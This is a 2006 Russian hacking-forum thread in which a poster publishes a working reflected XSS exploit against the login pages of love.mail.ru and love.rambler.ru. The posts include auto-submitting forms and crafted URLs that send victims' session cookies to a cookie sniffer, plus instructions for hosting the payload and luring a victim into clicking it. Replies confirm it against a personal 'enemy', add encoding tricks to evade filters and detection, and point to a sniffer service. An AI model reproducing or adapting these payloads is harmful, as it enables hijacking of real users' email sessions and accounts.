Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   XSS mail.ru rambler.ru (https://forum.antichat.xyz/showthread.php?t=28497)

slider 04.12.2006 20:40

XSS mail.ru rambler.ru
 
Гы гы ... долго же вы ждали темы как ломать эти почтовики =)

Старый добрый дядя slider вам расскроет тайну :)Да.. да... прям возьмём и угоним сессию..

Короче ... дело было вечером .. делать было нечего..
и полез я искать уязвимости на этих почтовиках..


После многих часов поиска (уважайте чужой труд! ;) ) нашол таки...
в файле http://love.mail.ru/my/login.phtml скрытую строку:
Код HTML:

<input type="hidden" name="tcurl">
Да да... именно она слабое звено!...
паразитка такая не фильтруетсо =)

вбил я в нее "><script>alert()</script> и вылез заветный алерт!..


А вот тут по сценарию вам надо дать exploit ))
С переадрессацией и со всеми наворотами ))

А вот он б*я =)

майл.ru

Код HTML:

<body onload="p.submit()">
<form action="http://love.mail.ru/my/login.phtml" method="post" id="p">
<input type="hidden" name="tcurl" value='"><script>img = new Image(); img.src = "http://antichat.ru/s/сниффер.gif?"+document.cookie;</script><script>navigate("http://love.mail.ru")</script>'>

рамблер.ru


Код HTML:

<body onload="p.submit()">
<form action="http://love.rambler.ru/my/login.phtml" method="post" id="p">
<input type="hidden" name="tcurl" value='"><script>img = new Image(); img.src = "http://antichat.ru/s/сниффер.gif?"+document.cookie;</script><script>navigate("http://love.rambler.ru")</script>'>


СПРОСИТЕ ВЫ А ПРИЧЁМ ТУТ ПОЧТОВИК mail.ru и rambler.ru ?

А вот причём... кука прийдёт и от лов и от майла! =)
Так что статейка думаю многим пригодистя =)

Ну что.. время пошло кто не успел тот опоздал... =)
Торопитесь время акции ограничего =)


С уважением
slider


Ахх да... как юзать ))
Сохраняете этот "сплойт" в html и качаете на народ.ru
далее даёте ссылку комунить на свой "скрипт"... ))
Удачи!..


Вот вам ещё скриптеГ =)

Код HTML:

http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>
Чтоб было меньше палева .. кодируем это .. и получисо чтот типа того!..

Код HTML:

http://love.mail.ru/my/login.phtml?tcurl=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%29%3C%2F%73%63%72%69%70%74%3E

Ksander 04.12.2006 20:53

Засекаем время сколько бага проживет =)

slider 04.12.2006 20:56

Отпишитесь хоть.. КОМУ пригодилось! =)

[loy] 04.12.2006 21:14

http://love.mail.ru/my/login.phtml?tcurl=%22%3E%3Cscript%3Ealert('12');%3 C/script%3E%22!--%3C

или так http://love.mail.ru/my/login.phtml?tcurl="><script>document.location='htt p://forum.antichat.ru';</script><!--"
<a href='http://love.mail.ru/my/login.phtml?tcurl="><script>document.location=\'ht tp://forum.antichat.ru\'</script><!--"'>ФОрум</a>

я конечно не понял точно как сделал слайдер
но вот как я сделел

Chumak 04.12.2006 21:18

Мда только жаль что я ен умею этим пользоваться..

Chumak 04.12.2006 21:20

"Торопитесь время акции ограничего =)"
Мда

slider 04.12.2006 21:31

http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>

И так можно использовать!!! =)
но это как то банально!

MegaBits 04.12.2006 22:15

Я что-то не понял это активная XSS, и где надо запостить этот текст http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>?
Извените за тупые вопросы просто с XSS плохо разбираюсь.

vectorg 04.12.2006 22:30

Цитата:

Сообщение от MegaBits
Я что-то не понял это активная XSS, и где надо запостить этот текст http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>?
Извените за тупые вопросы просто с XSS плохо разбираюсь.

Обычная пассивная xss
Жертва должна перейти по ссылке, либо быть перенаправленной на нее

xzz 04.12.2006 22:31

Только что опробовал, сделал все как по учебнику ,скрипт вроде рабочий,..но мля куки на снифер не летят.
Кто нить знает в чем причина? В снифере, как была одна запись ...так одна и есть. Mожет я не правильно снифер зарегал ? В " Картинка" что нано писать? Изаиняюсь за дебильные вопросы........ :confused:

Abra 04.12.2006 23:05

Походу плюсик начал фильтроваться ;)
Вернее + просто вырезается, а если пытаешься замаскировать, то отрезается все что идет после плюса.

Abra 04.12.2006 23:10

НАврал - простое урл шифрование плюса и все катит.

Sn@k3 05.12.2006 00:27

эх жаль в письме низя"ВНИМАНИЕ!
Данное письмо содержит потенциально опасный Html-код,
заблокированный автоматической системой безопасности."
а то ссылку давать не каждый пойдёт-то...

KPOT_f!nd 05.12.2006 02:07

Пробовал! Пашет! Пока бага актуальна!

xzz 05.12.2006 09:35

Все,.. пашет! Спасибо Slider ! Наконец то я достал врага.




Сам ты чайник....я просто покурил вчера больше чем надо...

wano81 05.12.2006 11:57

а никто не подскажет какой нить альтернативный сниффер просто я никак не могу завести свой на античате

InferNo23 05.12.2006 12:07

http://xss.netsec.ru

Chumak 05.12.2006 14:07

Респект...Sliderу

slider 05.12.2006 15:03

Гы гы... значит всё таки не зря старалсо! =)

CRL 05.12.2006 15:06

Красавец!!!!!!!!!! Супер! Отлично

А®ТеS 05.12.2006 16:03

Spaсибо, все ок!!!

Makes 05.12.2006 17:40

Все вроде делаю, как указано на первой странице. Чего то не прокатывает. Видимо делаю что-то не так. Ваш рабочий вариант на данный момент отличается от оного на первой странице?

m17 05.12.2006 17:51

вчера "+" фильтровать начали, но с concat все нормально пашет. советую ссылку обработать такой функией:
PHP код:

function full_encode($str)
{
    
$result '';
    for (
$i=0$i strlen($str); $i++)
        
$result .= ("%" bin2hex(substr($str$i1)));

    return 
strtoupper($result);
        


так проще впарить. думаю Вам не надо объяснять почему так...

slider 05.12.2006 18:11

Ничё там не фильтруется!...
всё работает!

Sn@k3 05.12.2006 18:18

пиши видео под зачет)))пока актуально))) а то там нового ничего нет) правда у меня все же пишет опасный код))

Chumak 05.12.2006 18:18

А у меня куки на сниффер только от фаерфокса почемуто приходят...

Chumak 05.12.2006 18:19

"пиши видео под зачет)))пока актуально))) а то там нового ничего нет) правда у меня все же пишет опасный код))"
Точно...

Makes 05.12.2006 18:27

Ну почему тогда у меня ничего не пашет. Выдает:

Ошибка: Неверно указан логин или пароль

А наряду с полями для логина и пароля выдает (">) без скобок

m17 05.12.2006 18:28

Цитата:

Ничё там не фильтруется!...
всё работает!
Фильтруется.
Код HTML:

"><script>alert(document.cookie);</script><br style="
покажет куки
Код HTML:

"><script>alert(document.cookie+'dead-plus');</script><br style="
промолчит

откроем исходник и увидим:
Код HTML:

name="tcurl" value=""><script>alert(document.cookie "dead-plus");</script>
("+" исчез)

только что еще раз затестил

slider 05.12.2006 18:37

ХЗ ..куки приходят!

Chumak 05.12.2006 18:41

"Ну почему тогда у меня ничего не пашет. Выдает:

Ошибка: Неверно указан логин или пароль

А наряду с полями для логина и пароля выдает (">) без скобок"
Куки все равно приходят...
СДЕЛАЙте ВИДИО!

slider 05.12.2006 18:50

ЖДИТЕ!.. =)

m17 05.12.2006 18:50

Цитата:

Сообщение от slider
ХЗ ..куки приходят!

ну правильно, если он у тебя записан кодом то все нормально, но сам символ без кодировки фильтром режется. правда подходит только urlencode, в других кодировках вообще плюс и всё что после него отсекается.

КИНГ 05.12.2006 19:12

жива еще Xss?

Chumak 05.12.2006 19:26

ААА..видио..быстрей!!!

m17 05.12.2006 21:09

для самых нетерпеливых =)

вот моя версия видео) http://armed.h12.ru/xss.rar

безусловно, все права принадлежат slider'y, поэтому по первому требованию файл уберу.

сорри, наверное немного косячно) но у меня это первый такой мувик)

ссылка не совсем прямая, если так можно сказать)
при переходе появиться сообщение что файл находится на сервере бесплатного хостинга, там ссылку и нажмете...)

Mokfyl 05.12.2006 21:21

Через чо у тебя это видео посмотреть-то можно??

Rebz 05.12.2006 21:27

нда..а нормальным чем-нибудь мог записать? или ты с учетом на то что нам кодеки дополнительные качать надо?) лол

m17 05.12.2006 21:34

ну сорри, на самом деле первый раз это делал, просто запусил ScreenVirtuoso Pro с настройками по дефолту... кодек FMVC/MSVC

DSH 4CC FMVC
VFW Description FM Screen Capture Codec
DSH DirectShow CLSID CLSID_AVIDec {CF49D4E0-1115-11CE-B03A-0020AF0BA770}
REG Driver File F:\WINDOWS\system32\fmcodec.dll
DSH Friendly Name FM Screen Capture Codec
- - Function Decoder
REG Merit 0x00200000
VFW Name FMCodec
- - Type VFW

Mokfyl 05.12.2006 21:40

а где его взять можно?


Время: 17:17